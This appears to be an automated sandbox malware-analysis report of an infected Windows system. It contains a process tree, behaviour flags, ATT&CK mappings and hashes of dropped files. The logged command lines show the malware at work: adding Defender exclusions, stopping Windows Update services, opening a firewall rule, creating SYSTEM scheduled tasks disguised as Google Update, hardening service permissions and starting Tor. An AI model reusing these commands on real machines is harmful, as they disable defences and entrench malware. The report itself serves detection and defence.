PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4476 wrote to memory of 4464 4476 4AF.exe 110 PID 4464 wrote to memory of 2968 4464 4AF.exe 111 PID 4464 wrote to memory of 2968 4464 4AF.exe 111 PID 4464 wrote to memory of 2968 4464 4AF.exe 111 PID 4464 wrote to memory of 4444 4464 4AF.exe 112 PID 4464 wrote to memory of 4444 4464 4AF.exe 112 PID 4464 wrote to memory of 4444 4464 4AF.exe 112 PID 3292 wrote to memory of 4472 3292 Explorer.EXE 129 PID 3292 wrote to memory of 4472 3292 Explorer.EXE 129 PID 3292 wrote to memory of 4472 3292 Explorer.EXE 129 PID 3292 wrote to memory of 4976 3292 Explorer.EXE 114 PID 3292 wrote to memory of 4976 3292 Explorer.EXE 114 PID 4976 wrote to memory of 1080 4976 regsvr32.exe 115 PID 4976 wrote to memory of 1080 4976 regsvr32.exe 115 PID 4976 wrote to memory of 1080 4976 regsvr32.exe 115 PID 4472 wrote to memory of 2308 4472 WerFault.exe 116 PID 4472 wrote to memory of 2308 4472 WerFault.exe 116 PID 4472 wrote to memory of 2308 4472 WerFault.exe 116 PID 3292 wrote to memory of 4308 3292 Explorer.EXE 125 PID 3292 wrote to memory of 4308 3292 Explorer.EXE 125 PID 3292 wrote to memory of 4308 3292 Explorer.EXE 125 PID 3408 wrote to memory of 1520 3408 275D.exe 117 PID 3408 wrote to memory of 1520 3408 275D.exe 117 PID 3408 wrote to memory of 1520 3408 275D.exe 117 PID 4472 wrote to memory of 4456 4472 WerFault.exe 121 PID 4472 wrote to memory of 4456 4472 WerFault.exe 121 PID 4472 wrote to memory of 4456 4472 WerFault.exe 121 PID 2308 wrote to memory of 4148 2308 InstallSetup5.exe 119 PID 2308 wrote to memory of 4148 2308 InstallSetup5.exe 119 PID 2308 wrote to memory of 4148 2308 InstallSetup5.exe 119 PID 3292 wrote to memory of 3104 3292 Explorer.EXE 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe"C:\Users\Admin\AppData\Local\Temp\1f41d3a0527983c765effac94ad197d4ae778ba512e2e66edd29c43251c6f80e.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\328.exeC:\Users\Admin\AppData\Local\Temp\328.exe2⤵
- Executes dropped EXE
PID:1812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 28723⤵
- Program crash
PID:728
-
-
-
C:\Users\Admin\AppData\Local\Temp\4AF.exeC:\Users\Admin\AppData\Local\Temp\4AF.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\4AF.exeC:\Users\Admin\AppData\Local\Temp\4AF.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ebaea8d4-fb0b-4643-ad68-308d4ded9274" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\4AF.exe"C:\Users\Admin\AppData\Local\Temp\4AF.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4444 -
C:\Users\Admin\AppData\Local\Temp\4AF.exe"C:\Users\Admin\AppData\Local\Temp\4AF.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
PID:4200 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 5766⤵
- Program crash
PID:4128
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AFA.exeC:\Users\Admin\AppData\Local\Temp\AFA.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\notepad.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\notepad.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SYSTEM32\rundll32.exerundll32 cleanhelper.dll T34 /k rulet421 /auto4⤵
- Loads dropped DLL
PID:2128
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\updater\gup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\updater\gup.exe" -v8.58 -px644⤵PID:1928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F21.exeC:\Users\Admin\AppData\Local\Temp\F21.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\275D.exeC:\Users\Admin\AppData\Local\Temp\275D.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Users\Admin\AppData\Local\Temp\275D.exe"C:\Users\Admin\AppData\Local\Temp\275D.exe"3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
PID:3100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2596
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:3184
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:2220
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3608
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵PID:4252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4864
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:4944
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵
- Blocklisted process makes network request
PID:1812 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1384
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵PID:4104
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:2632
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵PID:3104
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:5092
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:1276
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵PID:1648
-
C:\Windows\SysWOW64\sc.exesc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
PID:1608
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3161.exeC:\Users\Admin\AppData\Local\Temp\3161.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\665C.exeC:\Users\Admin\AppData\Local\Temp\665C.exe2⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\Broom.exeC:\Users\Admin\AppData\Local\Temp\Broom.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4148
-
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4456 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4332
-
-
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"4⤵
- Executes dropped EXE
PID:2600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5040
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:1476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4248
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:1912
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\6EAA.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\6EAA.dll3⤵
- Loads dropped DLL
PID:1080
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3104
-
-
C:\Users\Admin\AppData\Local\Temp\741A.exeC:\Users\Admin\AppData\Local\Temp\741A.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:3644
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:2704
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4684
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:976
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2300
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:536
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3116
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1436
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2144
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1284
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:3236
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3740
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3676
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4448
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:2216
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3124
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1072
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2188
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:436
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1456
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2348
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3012
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:3668
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:232
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1368
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:2468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4200 -ip 42001⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1812 -ip 18121⤵PID:3184
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"1⤵PID:4668
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:2144
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Boot or Logon Initialization Scripts
1Logon Script (Windows)
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Boot or Logon Initialization Scripts
1Logon Script (Windows)
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5bae29e49e8190bfbbf0d77ffab8de59d
SHA14a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA5129e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD51d7f3d1036cc09d2b9c5d8d5acfbb867
SHA15a76ade3e2ced7d72b6ce450b074d3c5aaa13b85
SHA2560725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c
SHA512dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8
-
Filesize
21KB
MD5f290b4b441dc836172c228abb0975bf5
SHA1ebeaa8c8ddddae00b5f3aba2cca58063a7c42277
SHA256b7f352c592e5f5148ad5e36c39da2d7cd4b14ad72df651b13f5ff12455abfb77
SHA512b1240f93c4683186c62617992651c8d6e56fadf99889b233c9ba85441643fe524e0ec963565826e471e469766ce51edb9bdf7a51fc55f3f76184d1c7223c6773
-
Filesize
944B
MD560804e808a88131a5452fed692914a8e
SHA1fdb74669923b31d573787fe024dbd701fa21bb5b
SHA256064fdd6e9e6e7f51da354604a56f66217f1edfc12d9bbbaf869a628915a86a61
SHA512d4f2791433c0bacd8cad57b40fab4a807db4dd74f7c5357d2bce9aaa6544f97667497307d1e0704b98e2c99a94775fbb6ea676685a01578e4d0304f541c9854a
-
Filesize
4.2MB
MD5890bfdf3c7eecbb505c0fdc415f466b3
SHA190889e27be89519f23d85915956d989b75793c8d
SHA256e617e19dce9f15496c331be6daf2006a03573d50e42b34f2ae9ee4aee2bc8c72
SHA512e08f327a03ede89a8e8df0a50244458095ed8afd132be8f21323cb81cfe5fb09d18266d0f5186dfd12d48649ffbb2dd1c8ec35951702f2b99adb1075fd776ece
-
Filesize
4.2MB
MD5890bfdf3c7eecbb505c0fdc415f466b3
SHA190889e27be89519f23d85915956d989b75793c8d
SHA256e617e19dce9f15496c331be6daf2006a03573d50e42b34f2ae9ee4aee2bc8c72
SHA512e08f327a03ede89a8e8df0a50244458095ed8afd132be8f21323cb81cfe5fb09d18266d0f5186dfd12d48649ffbb2dd1c8ec35951702f2b99adb1075fd776ece
-
Filesize
4.2MB
MD5890bfdf3c7eecbb505c0fdc415f466b3
SHA190889e27be89519f23d85915956d989b75793c8d
SHA256e617e19dce9f15496c331be6daf2006a03573d50e42b34f2ae9ee4aee2bc8c72
SHA512e08f327a03ede89a8e8df0a50244458095ed8afd132be8f21323cb81cfe5fb09d18266d0f5186dfd12d48649ffbb2dd1c8ec35951702f2b99adb1075fd776ece
-
Filesize
257KB
MD551423b8501e9fb2b50fe19d34e840943
SHA1a70c5c5e400b93abd450f57c5f54fabdf9d7e3ef
SHA25681fd9d7cc4e753531cce63dffb3255507019772f0c66398c4ef7affb6379dda3
SHA512669f31787e72660a1778c75f706df8c3cdca0d2449fbbbbaf1e4fadf4a0572f61f955e7b0364abef29e2db1c2f74192995b850d800268acc6a51d29065eccc4a
-
Filesize
257KB
MD551423b8501e9fb2b50fe19d34e840943
SHA1a70c5c5e400b93abd450f57c5f54fabdf9d7e3ef
SHA25681fd9d7cc4e753531cce63dffb3255507019772f0c66398c4ef7affb6379dda3
SHA512669f31787e72660a1778c75f706df8c3cdca0d2449fbbbbaf1e4fadf4a0572f61f955e7b0364abef29e2db1c2f74192995b850d800268acc6a51d29065eccc4a
-
Filesize
448KB
MD5fd7374d02a0ff1abcde58f00cce459a7
SHA168cd154a342c90ee9d72645265570991f352c3ea
SHA2569893f7e1fad5272b739b45fe1c54ca4adeff744a55f4aec848dd283f350ab4e0
SHA512be9cf1f19d06a9488b09515101ca3d47cbc85d8ac88443d2037adf4b7fc2a766331ef6582e5ff284ae1e845b994557853e905191a452ed0fea0c719107b596b4
-
Filesize
448KB
MD5fd7374d02a0ff1abcde58f00cce459a7
SHA168cd154a342c90ee9d72645265570991f352c3ea
SHA2569893f7e1fad5272b739b45fe1c54ca4adeff744a55f4aec848dd283f350ab4e0
SHA512be9cf1f19d06a9488b09515101ca3d47cbc85d8ac88443d2037adf4b7fc2a766331ef6582e5ff284ae1e845b994557853e905191a452ed0fea0c719107b596b4
-
Filesize
829KB
MD5b85c4c3bf725cef015c9fa282ad43541
SHA15c313f5828dc9484c68cc434b853f58069c46899
SHA2569dfbf2d135fd68c1aa0f6332902f81043c9a3efad5b89807af16209436372b69
SHA512f8f418b9cb378b7bdc6c1718a27b4dc7bd56ef196b6d14daa6276385897f9d2b445de61811fc1d930479480de6a4b968bae89bc4509a3c425fde2078fd0582b4
-
Filesize
829KB
MD5b85c4c3bf725cef015c9fa282ad43541
SHA15c313f5828dc9484c68cc434b853f58069c46899
SHA2569dfbf2d135fd68c1aa0f6332902f81043c9a3efad5b89807af16209436372b69
SHA512f8f418b9cb378b7bdc6c1718a27b4dc7bd56ef196b6d14daa6276385897f9d2b445de61811fc1d930479480de6a4b968bae89bc4509a3c425fde2078fd0582b4
-
Filesize
829KB
MD5b85c4c3bf725cef015c9fa282ad43541
SHA15c313f5828dc9484c68cc434b853f58069c46899
SHA2569dfbf2d135fd68c1aa0f6332902f81043c9a3efad5b89807af16209436372b69
SHA512f8f418b9cb378b7bdc6c1718a27b4dc7bd56ef196b6d14daa6276385897f9d2b445de61811fc1d930479480de6a4b968bae89bc4509a3c425fde2078fd0582b4
-
Filesize
829KB
MD5b85c4c3bf725cef015c9fa282ad43541
SHA15c313f5828dc9484c68cc434b853f58069c46899
SHA2569dfbf2d135fd68c1aa0f6332902f81043c9a3efad5b89807af16209436372b69
SHA512f8f418b9cb378b7bdc6c1718a27b4dc7bd56ef196b6d14daa6276385897f9d2b445de61811fc1d930479480de6a4b968bae89bc4509a3c425fde2078fd0582b4
-
Filesize
829KB
MD5b85c4c3bf725cef015c9fa282ad43541
SHA15c313f5828dc9484c68cc434b853f58069c46899
SHA2569dfbf2d135fd68c1aa0f6332902f81043c9a3efad5b89807af16209436372b69
SHA512f8f418b9cb378b7bdc6c1718a27b4dc7bd56ef196b6d14daa6276385897f9d2b445de61811fc1d930479480de6a4b968bae89bc4509a3c425fde2078fd0582b4
-
Filesize
12.2MB
MD550638a91e34127b6e8da9e00adc5d443
SHA1daebc5d190afc76e45277cc9c8203cdb750a3183
SHA2564abd157267e0e423d698f49a60011c7d0c9fc30e21585ff42f974909e37bde4d
SHA51235937896edb557f6bc63581e56e9bbde4dc878545a8004a2f0f9d7f7c93195903b0ec65c410837a81a024e1bf384bfbd056ddb64ccab3d6b79d7ba60afad1f5d
-
Filesize
12.2MB
MD550638a91e34127b6e8da9e00adc5d443
SHA1daebc5d190afc76e45277cc9c8203cdb750a3183
SHA2564abd157267e0e423d698f49a60011c7d0c9fc30e21585ff42f974909e37bde4d
SHA51235937896edb557f6bc63581e56e9bbde4dc878545a8004a2f0f9d7f7c93195903b0ec65c410837a81a024e1bf384bfbd056ddb64ccab3d6b79d7ba60afad1f5d
-
Filesize
1.6MB
MD58607cc39f96e0fa313a311c01b0613ec
SHA119ee89471695b09013331b6a66bcc10e3aef1cc4
SHA256defe429bed520f465930ba2886f6492d0f9c6893f115e03414c72f13843061f3
SHA512be3aea9ed983df319e2b42b980dc2fc6266bb07d49fd294143a04df509706128a2686291ee465323cf912c3cb2cc627fb70a84b5feb342d6e33b1fca0d3f53bb
-
Filesize
1.6MB
